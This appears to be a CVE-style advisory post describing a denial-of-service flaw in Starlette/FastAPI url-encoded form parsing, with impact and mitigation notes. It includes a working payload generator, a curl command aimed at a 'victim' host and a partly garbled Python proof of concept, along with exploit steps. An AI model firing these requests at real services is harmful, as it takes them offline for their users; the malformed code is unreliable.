Listen to this Post
The `request.form()` method in Starlette (and FastAPI) accepts `max_fields` and `max_part_size` parameters to limit resource consumption when parsing form data. These limits are enforced correctly for `multipart/form-data` requests, but are completely ignored for `application/x-www-form-urlencoded` requests. Because the url-encoded parser is constructed without receiving these parameters, it performs no field count check and no per‑field size check, appending every field name and value without validation.
An unauthenticated attacker can exploit this in two ways:
1. Field count attack – Sending a body with ~1,000,000 fields (for example, f0=v&f1=v&...), which fits in a sub‑10 MB payload. The synchronous parsing blocks the worker’s event loop for several seconds, during which the worker cannot serve any other requests.
2. Field size attack – Sending a single field with an extremely large value (e.g., 50 MB). The entire value is buffered in memory to build the `FormData` object, causing memory allocation proportional to the request body.
In both cases, parallel requests can render the service completely unusable. A reverse proxy that imposes a request body size limit reduces but does not eliminate the exposure, because the field‑count attack already works with a sub‑10 MB payload. The equivalent `multipart/form-data` request is correctly rejected with a `400 Too many fields` or `400 Field exceeded maximum size` error.
DailyCVE Form:
- Platform: `Starlette/FastAPI`
– Version: `<=1.3.0` - Vulnerability: `DoS via Form Limits Bypass` - Severity: `High` - date: `2026-06-15` - Prediction: `2026-07-15`
What Undercode Say
Generate malicious payload (field count attack):
python3 -c "print('&'.join([f'f{i}=v' for i in range(1000000)]))" > payload.txt
Send the attack with curl:
curl -X POST http://victim:8000/submit \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-binary @payload.txt
Python proof‑of‑concept (field size attack):
import requests
large_field = "a" (50 1024 1024) 50 MB
data = {"big": large_field}
requests.post("http://victim:8000/submit", data=data)
Exploit
- Identify a Starlette or FastAPI endpoint that calls
request.form().
2. Craft a `application/x-www-form-urlencoded` POST request with either:
- Millions of small fields (e.g.,
f0=v&f1=v&...) to block the event loop, or - A single giant field (e.g., 50 MB) to exhaust memory.
- Send multiple such requests in parallel to amplify the impact.
Protection
- Upgrade to a patched version of Starlette that forwards `max_fields` and `max_part_size` to the url‑encoded parser.
- Set explicit limits in your code:
request.form(max_fields=1000, max_part_size=1048576). - Use a reverse proxy to enforce a global request body size limit (e.g., 10 MB), though this only partially mitigates the field‑count attack.
Impact
- Event loop blocking – A single request with 1,000,000 fields blocks the worker for several seconds, preventing it from handling any other request.
- Unbounded memory allocation – A single large field (e.g., 50 MB) forces memory allocation proportional to the request body, potentially causing OOM kills or swapping.
- Denial of Service – Parallel requests easily render the service unusable, affecting all Starlette‑ and FastAPI‑based applications that process url‑encoded forms.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
